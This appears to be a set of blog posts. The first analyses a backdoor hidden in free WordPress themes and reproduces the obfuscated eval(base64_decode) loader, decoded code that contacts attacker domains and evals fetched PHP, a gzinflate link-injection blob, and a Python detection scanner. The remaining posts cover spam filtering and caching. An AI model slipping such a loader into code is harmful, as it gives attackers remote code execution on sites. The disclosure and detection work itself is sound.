WordPress Theme Arbitrary Code Execution

A friend of mine has a WordPress weblog that displayed something fishy on it. Something to the effect of

Unable to fclose(), not a valid resource

That struck me as odd, so I dug a little deeper and saw this in his theme’s header.php (I added the newlines for display purposes):

<body><?php @eval(@base64_decode('aWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNiA9IEBmc29ja
29wZW4oInd3dy53cHNzci5jb20iLCA4MCwgJFIzMkQwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiwgJFI1RjUyNUY1QjM5OERBRE
Q3Q0YwNzg0QkQ0MDYyOThFMywgMykpICRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3Bzc3IiOyBlbHNlaWYoJ
FIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNiA9IEBmc29ja29wZW4oInd3dy53cHNuYy5jb20iLCA4MCwgJFIzMkQwMDA3M
EQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiwgJFI1RjUyNUY1QjM5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICRSNTBGNUY5Qzg
wRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMiOyBlbHNlICRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSA
id3BzbmMyIjsgQGV2YWwoJyRSMTRBRjFCRTlFRTI2QTkwOTIxRTY0QTgyRTc4MzY3OTcgPSAxOycpOyBpZigkUjE0QUYxQkU5RUUyNkE5
MDkyMUU2NEE4MkU3ODM2Nzk3IEFORCBpbmlfZ2V0KCdhbGxvd191cmxfZm9wZW4nKSkgeyAgJFJEM0ZFOUMxMEE4MDhBNTRFQTJBM0
RCRDlFNjA1QjY5NiA9ICIxIjsgICRSNkU0RjE0QjMzNTI0M0JFNjU2QzY1RTNFRDlFMUIxMTUgPSAiaHR0cDovL3d3dy4kUjUwRjVGOUM4MEYx
MkZGQUU4QjI0MDA1MjhFODFCMzRFLmNvbS93JFJEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFNjA1QjY5Ni5waHA/dXJsPSIuIHVybGVu
Y29kZSgkX1NFUlZFUlsnUkVRVUVTVF9VUkknXSkgLiImIi4gImhvc3Q9Ii4gdXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX0hPU1QnXSk7ICAkU
jNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCRSNkU0RjE0QjMzNTI0M0JFNjU2QzY1RTN
FRDlFMUIxMTUpOyAgQGV2YWwoJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MCk7IH0gZWxzZSB7ICAkUkQzRkU5QzEwQ
TgwOEE1NEVBMkEzREJEOUU2MDVCNjk2ID0gIjAiOyAgJFI2RTRGMTRCMzM1MjQzQkU2NTZDNjVFM0VEOUUxQjExNSA9ICJodHRwOi8vd3
d3LiRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUuY29tL3ckUkQzRkU5QzEwQTgwOEE1NEVBMkEzREJEOUU2MDVCNjk2Ln
BocD91cmw9Ii4gdXJsZW5jb2RlKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSAuIiYiLiAiaG9zdD0iLiB1cmxlbmNvZGUoJF9TRVJWRVJbJ0hU
VFBfSE9TVCddKTsgIEByZWFkZmlsZSgkUjZFNEYxNEIzMzUyNDNCRTY1NkM2NUUzRUQ5RTFCMTE1KTsgfSBmY2xvc2UoJFIzN0MwMTREQ
UU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNik7')); ?>

Which decodes to (again with the newlines added):

// Try two attacker-controlled hosts in turn; the one that answers decides which domain the loader talks to.
if($R37C014DAE5FE4FE5C77B6735ABC30916 = @fsockopen("www.wpssr.com", 80, $R32D00070D4FFBCCE2FC669BBA812D4C2, $R5F525F5B398DADD7CF0784BD406298E3, 3))
    $R50F5F9C80F12FFAE8B2400528E81B34E = "wpssr";
elseif($R37C014DAE5FE4FE5C77B6735ABC30916 = @fsockopen("www.wpsnc.com", 80, $R32D00070D4FFBCCE2FC669BBA812D4C2, $R5F525F5B398DADD7CF0784BD406298E3, 3))
    $R50F5F9C80F12FFAE8B2400528E81B34E = "wpsnc";
else
    $R50F5F9C80F12FFAE8B2400528E81B34E = "wpsnc2";
@eval('$R14AF1BE9EE26A90921E64A82E7836797 = 1;');
if($R14AF1BE9EE26A90921E64A82E7836797 AND ini_get('allow_url_fopen')) {
    // allow_url_fopen on: fetch PHP from the remote host, leaking the visitor's request URI and host name, and run it.
    $RD3FE9C10A808A54EA2A3DBD9E605B696 = "1";
    $R6E4F14B335243BE656C65E3ED9E1B115 = "http://www.$R50F5F9C80F12FFAE8B2400528E81B34E.com/w$RD3FE9C10A808A54EA2A3DBD9E605B696.php?url=". urlencode($_SERVER['REQUEST_URI']) ."&". "host=". urlencode($_SERVER['HTTP_HOST']);
    $R3E33E017CD76B9B7E6C7364FB91E2E90 = @file_get_contents($R6E4F14B335243BE656C65E3ED9E1B115);
    @eval($R3E33E017CD76B9B7E6C7364FB91E2E90);
} else {
    // allow_url_fopen off: fall back to echoing whatever the remote host returns straight into the page.
    $RD3FE9C10A808A54EA2A3DBD9E605B696 = "0";
    $R6E4F14B335243BE656C65E3ED9E1B115 = "http://www.$R50F5F9C80F12FFAE8B2400528E81B34E.com/w$RD3FE9C10A808A54EA2A3DBD9E605B696.php?url=". urlencode($_SERVER['REQUEST_URI']) ."&". "host=". urlencode($_SERVER['HTTP_HOST']);
    @readfile($R6E4F14B335243BE656C65E3ED9E1B115);
}
// Not silenced with @, so when neither fsockopen() succeeds this is the "not a valid resource" warning seen on the site.
fclose($R37C014DAE5FE4FE5C77B6735ABC30916);

A classic arbitrary code execution backdoor behind a few levels of masking: the script picks whichever of the attacker’s hosts answers, fetches a PHP file from it with the visitor’s request URI and host name attached, and runs it with eval() (or, if allow_url_fopen is off, dumps the response into the page with readfile()). The fclose() warning that gave it away is simply what happens when neither host is reachable and fclose() is handed a boolean instead of a socket.

I looked at his other themes and saw three others with the same issue. In another theme, I saw this in footer.php:

eval(gzinflate(base64_decode('
bZCxisMwEERrG/wPgz8g6o2iwDV3XZpAajla24tt
SScpEQf5+MjxlRm2WGbYB7MnVRVBGn6AzbEdnEsU
WtXUKCO9gqHIoyWD/q+D1JgCDcd2Ssl3QuScD6ue
6ffOt/lwc2urznZhS7hSHzkRvu68GApSaAVtzWdE
pn5yMbEdR6I57qBCwM/uYjv/3iI8oR+aF90vhCEQ
QacOF+c/YZPz2aeJVvpH4uqC8YFixOVtb1wpSsum
lqL8oPRu6qrad7xVktML
')));

Which doesn’t turn out to be as bad: only a few links (run it yourself if you’re interested; I’m not into promoting badness). But still, the fact that it’s masked is very shady.
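As an added example (not code from the original post), here is a small Python scanner for the two wrapper shapes found above, eval(base64_decode(...)) in header.php and eval(gzinflate(base64_decode(...))) in footer.php: it peels each layer with the standard library and reports which risky calls and hosts the hidden code references. The theme content it scans is constructed inline; the loader and the example.invalid host names are hypothetical.

```python
import base64
import re
import zlib

# Wrapper shapes seen in the compromised themes: eval(base64_decode('...'))
# and eval(gzinflate(base64_decode('...'))), with or without the @ silencer.
WRAPPER_RE = re.compile(
    r"@?eval\s*\(\s*(?:@?(?P<inflate>gzinflate)\s*\(\s*)?@?base64_decode\s*\(\s*"
    r"['\"](?P<blob>[A-Za-z0-9+/=\s]+)['\"]",
    re.IGNORECASE,
)
# Calls whose presence in a decoded payload points at remote code loading.
SUSPICIOUS_CALLS = ("eval", "fsockopen", "file_get_contents", "readfile")


def unwrap_payloads(php_source):
    """Find eval(base64_decode(...)) wrappers, decode every layer and summarise
    which risky calls the hidden code makes and which hosts it contacts."""
    findings = []
    for m in WRAPPER_RE.finditer(php_source):
        blob = re.sub(r"\s+", "", m.group("blob"))  # blobs are often line-wrapped
        try:
            data = base64.b64decode(blob, validate=True)
            if m.group("inflate"):
                data = zlib.decompress(data, -zlib.MAX_WBITS)  # gzinflate = raw DEFLATE
        except (ValueError, zlib.error) as exc:
            findings.append({"offset": m.start(), "error": str(exc)})
            continue
        code = data.decode("utf-8", errors="replace")
        findings.append({
            "offset": m.start(),
            "layers": ["base64"] + (["gzinflate"] if m.group("inflate") else []),
            "calls": [c for c in SUSPICIOUS_CALLS if re.search(rf"\b{c}\s*\(", code)],
            "hosts": sorted(set(re.findall(r"(?:https?://|fsockopen\(\s*\")([\w.-]+)", code))),
            "code": code,
        })
    return findings


# Constructed sample (not the page's payload): a hypothetical header.php carrying a
# remote loader behind base64, and a footer.php with a gzinflate layer on top of it.
_LOADER = ('$p = @file_get_contents("http://www.example.invalid/w1.php?host="'
           ' . urlencode($_SERVER["HTTP_HOST"])); @eval($p);')
_B64 = base64.b64encode(_LOADER.encode()).decode()
_deflate = zlib.compressobj(wbits=-zlib.MAX_WBITS)
_RAW = _deflate.compress(b'echo "<a href=\\"http://links.example.invalid\\">x</a>";') + _deflate.flush()
_GZ_B64 = base64.b64encode(_RAW).decode()
SAMPLE_THEME = ("<body><?php @eval(@base64_decode('" + _B64[:40] + "\n" + _B64[40:] + "')); ?>\n"
                "<?php eval(gzinflate(base64_decode('" + _GZ_B64 + "'))); ?>\n")
```

Call unwrap_payloads() on the contents of any theme file; a finding whose decoded code calls eval() together with file_get_contents() or fsockopen() is the remote-loader pattern above, while a gzinflate layer that only hides links is the milder footer.php case.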

These themes were obtained from WPSphere.com and FreeWordPressLayouts.com, respectively. The links were purposely omitted; they don’t need any more PageRank. Who knew people were so shady. I urge those looking for WordPress themes to stay away from sites such as these.

Edit: I found a post on GigaOM that found this same issue, and even mentions WPSphere.com by name. I’m glad I’m not the first to find it.


Beta Testing Defensio

Akismet isn’t perfect. I’ve been using it to block my spam since it became available. One of its major problems is that it often lets through what Defensio calls URL-less spam, and sometimes lets through spam WITH URLs, which I don’t quite understand.

Anyway, right after this post I’ll be disabling Akismet and turning on the Defensio beta. I’ll be monitoring incoming spam, incoming ham, page load speed, etc. If you notice anything funky, let me know 🙂


Testing WP-Cache

This is only a test 🙂

If there are any problems, please let me know!


Akismet Annoyances

I use Akismet on my WordPress site to catch spam. At first I was very impressed with it. When I first installed it (a few weeks after it was announced), it worked very well; it would catch all spam and let all ham through. I’ve made sure to have the latest version of the Akismet plugin for WordPress installed. Since 99% of the spam determination is done on the Akismet server side, there haven’t been any client-side updates in some time. My Akismet setup has caught 25,521 spam comments so far.

But recently, it has been misbehaving on my site and on the sites of some of my friends that use it. I get 5-10 spam comments a week that Akismet thinks are ham, and every once in a while I’ll get a ham comment that Akismet thinks is spam. Then it will place SOME items in moderation which are VERY obviously spam (100+ links).

It’s annoying, and I wish Akismet would get it together. For now, I’ll be patient and keep flagging comments accordingly. After all, there’s still nothing better…

Edit: I found an announcement for Defensio, which could be an Akismet replacer. I requested information and perhaps inclusion in the beta. This sounds promising.


WordPress performs poorly.

When I first came into web development and blogging, I thought WordPress was great. It handled many of the things that I needed handled, and it did so intuitively and fairly quickly. Since then I’ve had lots of experience with poor performance, and with optimizing web code for performance. Let’s face it, we don’t all have dedicated quad cores for web hosting, nor do we necessarily have separate boxes for the DB server and the web server.

WordPress is not optimized for large amounts of traffic. There is seemingly no caching (within WordPress) whatsoever. On a normal page load it makes no fewer than 10 trips back to the database. That’s why if you see an unprotected WordPress site “dugg” or “slashdotted”, it will be down after only a moderate number of concurrent hits.

WP-Cache is a plugin for WordPress that caches pages and posts, so WordPress doesn’t have to hit the database on every page load. I couldn’t get it to work with my WordPress setup after about a half hour of tinkering, but in theory it would make WordPress a robust, non-performance-hog piece of software. But the point is that there should be no excuse for writing poorly performing code. There shouldn’t have to be a user-submitted tweak that “fixes” software so it isn’t slow.

Maybe we’ll see it when the WordPress team finally considers it high priority, perhaps by WordPress version 5.9.2.
